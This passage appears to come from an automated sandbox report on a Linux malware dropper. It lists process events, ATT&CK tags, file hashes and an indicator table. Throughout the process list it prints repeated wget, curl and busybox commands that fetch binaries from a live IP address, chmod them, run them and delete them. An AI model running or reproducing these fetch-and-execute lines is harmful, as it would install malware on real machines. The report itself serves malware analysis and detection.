  chmod 777 BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc
  2⤵
  - File and Directory Permissions Modification
  PID:972
- /tmp/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc
  ./BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc
  2⤵
  - Executes dropped EXE
  PID:973
- /bin/rm
  rm BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc
  2⤵
  PID:974
- /usr/bin/wget
  wget http://216.126.231.240/bins/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv
  2⤵
  PID:975
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:976
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv
  2⤵
  PID:977
- /bin/chmod
  chmod 777 3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv
  2⤵
  - File and Directory Permissions Modification
  PID:978
- /tmp/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv
  ./3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv
  2⤵
  - Executes dropped EXE
  PID:979
- /bin/rm
  rm 3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv
  2⤵
  PID:980
- /usr/bin/wget
  wget http://216.126.231.240/bins/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd
  2⤵
  PID:981
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:982
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd
  2⤵
  PID:983
- /bin/chmod
  chmod 777 pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd
  2⤵
  - File and Directory Permissions Modification
  PID:984
- /tmp/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd
  ./pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd
  2⤵
  - Executes dropped EXE
  PID:985
- /bin/rm
  rm pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd
  2⤵
  PID:986
- /usr/bin/wget
  wget http://216.126.231.240/bins/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp
  2⤵
  PID:987
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:988
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp
  2⤵
  PID:989
- /bin/chmod
  chmod 777 ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp
  2⤵
  - File and Directory Permissions Modification
  PID:990
- /tmp/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp
  ./ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp
  2⤵
  - Executes dropped EXE
  PID:991
- /bin/rm
  rm ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp
  2⤵
  PID:992

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc

Filesize
153B

MD5
998368d7c95ea4293237f2320546e440

SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4

SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736

SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Download Submit

ioc	pid	Process
/tmp/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc	751	THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc
/tmp/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU	781	dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU
/tmp/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX	820	O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX
/tmp/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7	847	rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7
/tmp/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7	853	UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7
/tmp/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ	859	gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ
/tmp/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc	865	BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc
/tmp/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv	871	3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv
/tmp/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd	877	pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd
/tmp/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp	883	ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp
/tmp/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN	889	QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN
/tmp/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t	895	QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t
/tmp/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK	901	wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK
/tmp/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D	907	9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D
/tmp/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN	913	QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN
/tmp/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t	919	QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t
/tmp/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK	925	wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK
/tmp/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D	931	9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D
/tmp/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU	937	dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU
/tmp/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX	943	O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX
/tmp/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7	949	rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7
/tmp/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7	955	UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7
/tmp/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ	961	gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ
/tmp/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc	967	THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc
/tmp/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc	973	BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc
/tmp/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv	979	3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv
/tmp/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd	985	pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd
/tmp/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp	991	ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp